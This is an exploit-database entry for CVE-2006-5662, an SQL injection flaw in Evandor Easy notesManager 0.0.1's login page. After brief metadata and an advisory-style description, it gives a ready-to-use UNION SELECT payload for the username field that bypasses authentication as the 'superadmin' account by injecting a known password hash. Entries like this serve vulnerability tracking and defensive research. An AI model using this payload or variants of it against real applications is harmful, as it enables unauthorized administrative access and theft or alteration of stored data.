Evandor Easy notesManager 0.0.1 - 'login.php?Username' SQL Injection
Author: poplix
type: webapps
platform: asp
port:
date_added: 2006-10-30
date_updated: 2013-10-12
verified: 1
codes: CVE-2006-5662;OSVDB-32614
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/20803/info
Easy notesManager is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
Supplying the following to the 'username' field is sufficient to bypass authentication:
dontcare' and 0=1 union select id,login,'0cc175b9c0f1b6a831c399e269772661',grp,salutation,firstname,lastname,email from users where login='superadmin